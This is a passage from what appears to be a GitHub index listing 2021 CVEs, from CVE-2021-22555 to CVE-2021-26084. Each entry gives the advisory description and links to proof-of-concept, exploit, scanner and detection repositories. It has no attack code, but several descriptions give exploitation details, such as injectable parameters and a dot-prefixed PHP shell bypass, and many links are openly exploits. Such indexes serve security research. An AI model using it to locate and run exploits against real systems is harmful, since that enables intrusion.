[xyjl-ly/CVE-2021-22555-Exploit](https://github.com/xyjl-ly/CVE-2021-22555-Exploit) +- [cgwalters/container-cve-2021-22555](https://github.com/cgwalters/container-cve-2021-22555) +- [daletoniris/CVE-2021-22555-esc-priv](https://github.com/daletoniris/CVE-2021-22555-esc-priv) +- [veritas501/CVE-2021-22555-PipeVersion](https://github.com/veritas501/CVE-2021-22555-PipeVersion) +- [masjohncook/netsec-project](https://github.com/masjohncook/netsec-project) +- [tukru/CVE-2021-22555](https://github.com/tukru/CVE-2021-22555) +- [pashayogi/CVE-2021-22555](https://github.com/pashayogi/CVE-2021-22555) +- [letsr00t/-2021-LOCALROOT-CVE-2021-22555](https://github.com/letsr00t/-2021-LOCALROOT-CVE-2021-22555) +- [letsr00t/CVE-2021-22555](https://github.com/letsr00t/CVE-2021-22555) + +### CVE-2021-22569 (2022-01-07) + +An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions. + + +- [Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java](https://github.com/Mario-Kart-Felix/A-potential-Denial-of-Service-issue-in-protobuf-java) + +### CVE-2021-22873 (2021-01-21) + +Revive Adserver before 5.1.0 is vulnerable to open redirects via the `dest`, `oadest`, and/or `ct0` parameters of the lg.php and ck.php delivery scripts. Such open redirects had previously been available by design to allow third party ad servers to track such metrics when delivering ads. However, third party click tracking via redirects is not a viable option anymore, leading to such open redirect functionality being removed and reclassified as a vulnerability. + + +- [K3ysTr0K3R/CVE-2021-22873-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-22873-EXPLOIT) + +### CVE-2021-22880 (2021-02-11) + +The PostgreSQL adapter in Active Record before 6.1.2.1, 6.0.3.5, 5.2.4.5 suffers from a regular expression denial of service (REDoS) vulnerability. Carefully crafted input can cause the input validation in the `money` type of the PostgreSQL adapter in Active Record to spend too much time in a regular expression, resulting in the potential for a DoS attack. This only impacts Rails applications that are using PostgreSQL along with money type columns that take user input. + + +- [halkichi0308/CVE-2021-22880](https://github.com/halkichi0308/CVE-2021-22880) + +### CVE-2021-22893 (2021-04-23) + +Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild. + + +- [ZephrFish/CVE-2021-22893_HoneyPoC2](https://github.com/ZephrFish/CVE-2021-22893_HoneyPoC2) +- [Mad-robot/CVE-2021-22893](https://github.com/Mad-robot/CVE-2021-22893) +- [orangmuda/CVE-2021-22893](https://github.com/orangmuda/CVE-2021-22893) + +### CVE-2021-22911 (2021-05-27) + +A improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 & 3.13 that could lead to unauthenticated NoSQL injection, resulting potentially in RCE. + + +- [CsEnox/CVE-2021-22911](https://github.com/CsEnox/CVE-2021-22911) +- [optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911](https://github.com/optionalCTF/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911) +- [jayngng/CVE-2021-22911](https://github.com/jayngng/CVE-2021-22911) +- [ChrisPritchard/CVE-2021-22911-rust](https://github.com/ChrisPritchard/CVE-2021-22911-rust) +- [MrDottt/CVE-2021-22911](https://github.com/MrDottt/CVE-2021-22911) +- [overgrowncarrot1/CVE-2021-22911](https://github.com/overgrowncarrot1/CVE-2021-22911) +- [Weisant/CVE-2021-22911-EXP](https://github.com/Weisant/CVE-2021-22911-EXP) + +### CVE-2021-22924 (2021-08-05) + +libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse, if one of them matches the setup.Due to errors in the logic, the config matching function did not take 'issuercert' into account and it compared the involved paths *case insensitively*,which could lead to libcurl reusing wrong connections.File paths are, or can be, case sensitive on many systems but not all, and caneven vary depending on used file systems.The comparison also didn't include the 'issuer cert' which a transfer can setto qualify how to verify the server certificate. + + +- [Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924](https://github.com/Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924) + +### CVE-2021-22941 (2021-09-23) + +Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller. + + +- [hoavt184/CVE-2021-22941](https://github.com/hoavt184/CVE-2021-22941) + +### CVE-2021-22986 (2021-03-31) + +On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. + + +- [dorkerdevil/CVE-2021-22986-Poc](https://github.com/dorkerdevil/CVE-2021-22986-Poc) +- [S1xHcL/f5_rce_poc](https://github.com/S1xHcL/f5_rce_poc) +- [Osyanina/westone-CVE-2021-22986-scanner](https://github.com/Osyanina/westone-CVE-2021-22986-scanner) +- [safesword/F5_RCE](https://github.com/safesword/F5_RCE) +- [microvorld/CVE-2021-22986](https://github.com/microvorld/CVE-2021-22986) +- [Al1ex/CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986) +- [kiri-48/CVE-2021-22986](https://github.com/kiri-48/CVE-2021-22986) +- [ZephrFish/CVE-2021-22986_Check](https://github.com/ZephrFish/CVE-2021-22986_Check) +- [yaunsky/CVE-202122986-EXP](https://github.com/yaunsky/CVE-202122986-EXP) +- [Tas9er/CVE-2021-22986](https://github.com/Tas9er/CVE-2021-22986) +- [dotslashed/CVE-2021-22986](https://github.com/dotslashed/CVE-2021-22986) +- [DDestinys/CVE-2021-22986](https://github.com/DDestinys/CVE-2021-22986) +- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC) +- [amitlttwo/CVE-2021-22986](https://github.com/amitlttwo/CVE-2021-22986) +- [huydung26/CVE-2021-22986](https://github.com/huydung26/CVE-2021-22986) + +### CVE-2021-23017 (2021-06-01) + +A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact. + + +- [niandy/nginx-patch](https://github.com/niandy/nginx-patch) +- [M507/CVE-2021-23017-PoC](https://github.com/M507/CVE-2021-23017-PoC) +- [lakshit1212/CVE-2021-23017-PoC](https://github.com/lakshit1212/CVE-2021-23017-PoC) +- [ShivamDey/CVE-2021-23017](https://github.com/ShivamDey/CVE-2021-23017) + +### CVE-2021-23132 (2021-03-04) + +An issue was discovered in Joomla! 3.0.0 through 3.9.24. com_media allowed paths that are not intended for image uploads + + +- [HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132) + +### CVE-2021-23358 (2021-03-29) + +The package underscore from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Injection via the template function, particularly when a variable property is passed as an argument as it is not sanitized. + + +- [EkamSinghWalia/Detection-script-for-cve-2021-23358](https://github.com/EkamSinghWalia/Detection-script-for-cve-2021-23358) +- [MehdiBoukhobza/SandBox_CVE-2021-23358](https://github.com/MehdiBoukhobza/SandBox_CVE-2021-23358) + +### CVE-2021-23369 (2021-04-12) + +The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source. + + +- [fazilbaig1/CVE-2021-23369](https://github.com/fazilbaig1/CVE-2021-23369) + +### CVE-2021-23383 (2021-05-04) + +The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source. + + +- [dn9uy3n/Check-CVE-2021-23383](https://github.com/dn9uy3n/Check-CVE-2021-23383) +- [fazilbaig1/CVE-2021-23383](https://github.com/fazilbaig1/CVE-2021-23383) + +### CVE-2021-23410 +- [azu/msgpack-CVE-2021-23410-test](https://github.com/azu/msgpack-CVE-2021-23410-test) + +### CVE-2021-23639 (2021-12-10) + +The package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine. + + +- [MohandAcherir/CVE-2021-23639](https://github.com/MohandAcherir/CVE-2021-23639) + +### CVE-2021-23758 (2021-12-03) + +All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution. + + +- [numanturle/CVE-2021-23758-POC](https://github.com/numanturle/CVE-2021-23758-POC) + +### CVE-2021-23840 (2021-02-16) + +Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). + + +- [Trinadh465/openssl-1.1.1g_CVE-2021-23840](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2021-23840) + +### CVE-2021-23841 (2021-02-16) + +The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). + + +- [Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841](https://github.com/Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841) +- [Satheesh575555/Openssl_1_1_0_CVE-2021-23841](https://github.com/Satheesh575555/Openssl_1_1_0_CVE-2021-23841) + +### CVE-2021-24027 (2021-04-06) + +A cache configuration issue prior to WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 may have allowed a third party with access to the device’s external storage to read cached TLS material. + + +- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm) + +### CVE-2021-24084 (2021-02-25) + +Windows Mobile Device Management Information Disclosure Vulnerability + + +- [Jeromeyoung/CVE-2021-24084](https://github.com/Jeromeyoung/CVE-2021-24084) +- [exploitblizzard/WindowsMDM-LPE-0Day](https://github.com/exploitblizzard/WindowsMDM-LPE-0Day) + +### CVE-2021-24085 (2021-02-25) + +Microsoft Exchange Server Spoofing Vulnerability + + +- [sourceincite/CVE-2021-24085](https://github.com/sourceincite/CVE-2021-24085) + +### CVE-2021-24086 (2021-02-25) + +Windows TCP/IP Denial of Service Vulnerability + + +- [0vercl0k/CVE-2021-24086](https://github.com/0vercl0k/CVE-2021-24086) +- [lisinan988/CVE-2021-24086-exp](https://github.com/lisinan988/CVE-2021-24086-exp) + +### CVE-2021-24096 (2021-02-25) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [FunPhishing/CVE-2021-24096](https://github.com/FunPhishing/CVE-2021-24096) + +### CVE-2021-24098 (2021-02-25) + +Windows Console Driver Denial of Service Vulnerability + + +- [waleedassar/CVE-2021-24098](https://github.com/waleedassar/CVE-2021-24098) + +### CVE-2021-24145 (2021-03-18) + +Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. + + +- [dnr6419/CVE-2021-24145](https://github.com/dnr6419/CVE-2021-24145) + +### CVE-2021-24155 (2021-04-05) + +The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. + + +- [0dayNinja/CVE-2021-24155.rb](https://github.com/0dayNinja/CVE-2021-24155.rb) + +### CVE-2021-24160 (2021-04-05) + +In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site. + + +- [hnthuan1998/CVE-2021-24160](https://github.com/hnthuan1998/CVE-2021-24160) +- [hnthuan1998/Exploit-CVE-2021-24160](https://github.com/hnthuan1998/Exploit-CVE-2021-24160) + +### CVE-2021-24356 (2021-06-14) + +In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites. + + +- [RandomRobbieBF/CVE-2021-24356](https://github.com/RandomRobbieBF/CVE-2021-24356) + +### CVE-2021-24499 (2021-08-09) + +The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + + +- [j4k0m/CVE-2021-24499](https://github.com/j4k0m/CVE-2021-24499) +- [hh-hunter/cve-2021-24499](https://github.com/hh-hunter/cve-2021-24499) +- [jytmX/CVE-2021-24499](https://github.com/jytmX/CVE-2021-24499) + +### CVE-2021-24507 (2021-08-09) + +The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues + + +- [RandomRobbieBF/CVE-2021-24507](https://github.com/RandomRobbieBF/CVE-2021-24507) + +### CVE-2021-24545 (2021-10-11) + +The WP HTML Author Bio WordPress plugin through 1.2.0 does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post/s. + + +- [V35HR4J/CVE-2021-24545](https://github.com/V35HR4J/CVE-2021-24545) +- [dnr6419/CVE-2021-24545](https://github.com/dnr6419/CVE-2021-24545) + +### CVE-2021-24563 (2021-10-11) + +The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly + + +- [V35HR4J/CVE-2021-24563](https://github.com/V35HR4J/CVE-2021-24563) + +### CVE-2021-24647 (2021-11-08) + +The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + + +- [RandomRobbieBF/CVE-2021-24647](https://github.com/RandomRobbieBF/CVE-2021-24647) + +### CVE-2021-24741 (2021-09-20) + +The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users. + + +- [dldygnl/CVE-2021-24741](https://github.com/dldygnl/CVE-2021-24741) + +### CVE-2021-24750 (2021-12-21) + +The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks + + +- [fimtow/CVE-2021-24750](https://github.com/fimtow/CVE-2021-24750) + +### CVE-2021-24807 (2021-11-08) + +The Support Board WordPress plugin before 3.3.5 allows Authenticated (Agent+) users to perform Cross-Site Scripting attacks by placing a payload in the notes field, when an administrator or any authenticated user go to the chat the XSS will be automatically executed. + + +- [dldygnl/CVE-2021-24807](https://github.com/dldygnl/CVE-2021-24807) + +### CVE-2021-24884 (2021-10-25) + +The Formidable Form Builder WordPress plugin before 4.09.05 allows to inject certain HTML Tags like <audio>,<video>,<img>,<a> and<button>.This could allow an unauthenticated, remote attacker to exploit a HTML-injection byinjecting a malicous link. The HTML-injection may trick authenticated users to follow the link. If the Link gets clicked, Javascript code can be executed. The vulnerability is due to insufficient sanitization of the "data-frmverify" tag for links in the web-based entry inspection page of affected systems. A successful exploitation incomibantion with CSRF could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These actions include stealing the users account by changing their password or allowing attackers to submit their own code through an authenticated user resulting in Remote Code Execution. If an authenticated user who is able to edit Wordpress PHP Code in any kind, clicks the malicious link, PHP code can be edited. + + +- [S1lkys/CVE-2021-24884](https://github.com/S1lkys/CVE-2021-24884) + +### CVE-2021-24917 (2021-12-06) + +The WPS Hide Login WordPress plugin before 1.9.1 has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. + + +- [dikalasenjadatang/CVE-2021-24917](https://github.com/dikalasenjadatang/CVE-2021-24917) +- [Cappricio-Securities/CVE-2021-24917](https://github.com/Cappricio-Securities/CVE-2021-24917) + +### CVE-2021-24959 (2022-03-14) + +The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks. + + +- [RandomRobbieBF/CVE-2021-24959](https://github.com/RandomRobbieBF/CVE-2021-24959) + +### CVE-2021-25003 (2022-03-14) + +The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE + + +- [biulove0x/CVE-2021-25003](https://github.com/biulove0x/CVE-2021-25003) + +### CVE-2021-25032 (2022-01-10) + +The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any new registered user with an administrator role. + + +- [RandomRobbieBF/CVE-2021-25032](https://github.com/RandomRobbieBF/CVE-2021-25032) + +### CVE-2021-25076 (2022-01-24) + +The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting + + +- [0xAbbarhSF/CVE-2021-25076](https://github.com/0xAbbarhSF/CVE-2021-25076) + +### CVE-2021-25094 (2022-04-25) + +The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker. + + +- [darkpills/CVE-2021-25094-tatsu-preauth-rce](https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce) +- [TUANB4DUT/typehub-exploiter](https://github.com/TUANB4DUT/typehub-exploiter) +- [xdx57/CVE-2021-25094](https://github.com/xdx57/CVE-2021-25094) +- [experimentalcrow1/TypeHub-Exploiter](https://github.com/experimentalcrow1/TypeHub-Exploiter) + +### CVE-2021-25162 (2021-03-30) + +A remote execution of arbitrary commands vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability. + + +- [twentybel0w/CVE-2021-25162](https://github.com/twentybel0w/CVE-2021-25162) + +### CVE-2021-25253 (2021-04-13) + +An improper access control vulnerability in Trend Micro Apex One, Trend Micro Apex One as a Service and OfficeScan XG SP1 on a resource used by the service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + + +- [msd0pe-1/CVE-2021-25253](https://github.com/msd0pe-1/CVE-2021-25253) + +### CVE-2021-25281 (2021-02-27) + +An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. + + +- [Immersive-Labs-Sec/CVE-2021-25281](https://github.com/Immersive-Labs-Sec/CVE-2021-25281) + +### CVE-2021-25374 (2021-04-09) + +An improper authorization vulnerability in Samsung Members "samsungrewards" scheme for deeplink in versions 2.4.83.9 in Android O(8.1) and below, and 3.9.00.9 in Android P(9.0) and above allows remote attackers to access a user data related with Samsung Account. + + +- [WithSecureLabs/CVE-2021-25374_Samsung-Account-Access](https://github.com/WithSecureLabs/CVE-2021-25374_Samsung-Account-Access) + +### CVE-2021-25461 (2021-09-09) + +An improper length check in APAService prior to SMR Sep-2021 Release 1 results in stack based Buffer Overflow. + + +- [bkojusner/CVE-2021-25461](https://github.com/bkojusner/CVE-2021-25461) + +### CVE-2021-25641 (2021-05-29) + +Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it. + + +- [Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept](https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept) +- [l0n3rs/CVE-2021-25641](https://github.com/l0n3rs/CVE-2021-25641) + +### CVE-2021-25642 (2022-08-25) + +ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used. + + +- [safe3s/CVE-2021-25642](https://github.com/safe3s/CVE-2021-25642) + +### CVE-2021-25646 (2021-01-29) + +Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process. + + +- [yaunsky/cve-2021-25646](https://github.com/yaunsky/cve-2021-25646) +- [lp008/CVE-2021-25646](https://github.com/lp008/CVE-2021-25646) +- [Ormicron/CVE-2021-25646-GUI](https://github.com/Ormicron/CVE-2021-25646-GUI) +- [Vulnmachines/Apache-Druid-CVE-2021-25646](https://github.com/Vulnmachines/Apache-Druid-CVE-2021-25646) +- [1n7erface/PocList](https://github.com/1n7erface/PocList) +- [givemefivw/CVE-2021-25646](https://github.com/givemefivw/CVE-2021-25646) +- [j2ekim/CVE-2021-25646](https://github.com/j2ekim/CVE-2021-25646) +- [luobai8/CVE-2021-25646-exp](https://github.com/luobai8/CVE-2021-25646-exp) + +### CVE-2021-25679 (2021-04-20) + +The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. NOTE: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched + + +- [3ndG4me/AdTran-Personal-Phone-Manager-Vulns](https://github.com/3ndG4me/AdTran-Personal-Phone-Manager-Vulns) + +### CVE-2021-25735 (2021-09-06) + +A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields. + + +- [darryk10/CVE-2021-25735](https://github.com/darryk10/CVE-2021-25735) + +### CVE-2021-25741 (2021-09-20) + +A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. + + +- [Betep0k/CVE-2021-25741](https://github.com/Betep0k/CVE-2021-25741) +- [cdxiaodong/CVE-2021-25741](https://github.com/cdxiaodong/CVE-2021-25741) + +### CVE-2021-25790 (2021-07-23) + +Multiple stored cross site scripting (XSS) vulnerabilities in the "Register" module of House Rental and Property Listing 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in all text fields except for Phone Number and Alternate Phone Number. + + +- [MrCraniums/CVE-2021-25790-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25790-Multiple-Stored-XSS) + +### CVE-2021-25791 (2021-07-23) + +Multiple stored cross site scripting (XSS) vulnerabilities in the "Update Profile" module of Online Doctor Appointment System 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in the First Name, Last Name, and Address text fields. + + +- [MrCraniums/CVE-2021-25791-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25791-Multiple-Stored-XSS) + +### CVE-2021-25801 (2021-07-26) + +A buffer overflow vulnerability in the __Parse_indx component of VideoLAN VLC Media Player 3.0.11 allows attackers to cause an out-of-bounds read via a crafted .avi file. + + +- [DShankle/VLC_CVE-2021-25801_Analysis](https://github.com/DShankle/VLC_CVE-2021-25801_Analysis) + +### CVE-2021-25804 (2021-07-26) + +A NULL-pointer dereference in "Open" in avi.c of VideoLAN VLC Media Player 3.0.11 can a denial of service (DOS) in the application. + + +- [DShankle/VLC_CVE-2021-25804_Analysis](https://github.com/DShankle/VLC_CVE-2021-25804_Analysis) + +### CVE-2021-25837 (2021-02-08) + +Cosmos Network Ethermint <= v0.4.0 is affected by cache lifecycle inconsistency in the EVM module. Due to the inconsistency between the Storage caching cycle and the Tx processing cycle, Storage changes caused by a failed transaction are improperly reserved in memory. Although the bad storage cache data will be discarded at EndBlock, it is still valid in the current block, which enables many possible attacks such as an "arbitrary mint token". + + +- [iczc/Ethermint-CVE-2021-25837](https://github.com/iczc/Ethermint-CVE-2021-25837) + +### CVE-2021-26084 (2021-08-30) + +In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. + + +- [crowsec-edtech/CVE-2021-26084](https://github.com/crowsec-edtech/CVE-2021-26084) +- [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC) +- [dinhbaouit/CVE-2021-26084](https://github.com/dinhbaouit/CVE-2021-26084) +- [JKme/CVE-2021-26084](https://github.com/JKme/CVE-2021-26084) +- [hev0x/CVE-2021-26084_Confluence](https://github.com/hev0x/CVE-2021-26084_Confluence) +- [prettyrecon/CVE-2021-26084_Confluence](https://github.com/prettyrecon/CVE-2021-26084_Confluence) +- [0xf4n9x/CVE-2021-26084](https://github.com/0xf4n9x/CVE-2021-26084) +- [Vulnmachines/Confluence_CVE-2021-26084](https://github.com/Vulnmachines/Confluence_CVE-2021-26084) +- [Osyanina/westone-CVE-2021-26084-scanner](https://github.com/Osyanina/westone-CVE-2021-26084-scanner) +- [CrackerCat/CVE-2021-26084](https://github.com/CrackerCat/CVE-2021-26084) +- [b1gw00d/CVE-2021-26084](https://github.com/b1gw00d/CVE-2021-26084) +- [taythebot/CVE-2021-26084](https://github.com/taythebot/CVE-2021-26084) +- [bcdannyboy/CVE-2021-26084_GoPOC](https://github.com/bcdannyboy/CVE-2021-26084_GoPOC) +- [smallpiggy/cve-2021-26084-confluence](https://github.com/smallpiggy/cve-2021-26084-confluence) +- [maskerTUI/CVE-2021-26084](https://github.com/maskerTUI/CVE-2021-26084) +- [BeRserKerSec/CVE-2021-26084-Nuclei-template](https://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template) +- [p0nymc1/CVE-2021-26084](https://github.com/p0nymc1/CVE-2021-26084) +- [Loneyers/CVE-2021-26084](https://github.com/Loneyers/CVE-2021-26084) +- [Xc1Ym/cve_2021_26084](https://github.com/Xc1Ym/cve_2021_26084) +- [wolf1892/confluence-rce-poc](https://github.com/wolf1892/confluence-rce-poc) +- [smadi0x86/CVE-2021-26084](https://github.com/smadi0x86/CVE-2021-26084) +- [kkin77/CVE-2021-26084-Confluence-OGNL](https://github.com/kkin77/CVE-2021-26084-Confluence-OGNL) +- [1ZRR4H/CVE-2021-26084](https://github.com/1ZRR4H/CVE-2021-26084) +- [GlennPegden2/cve-2021-26084-confluence](https://github.com/GlennPegden2/cve-2021-26084-confluence) +- 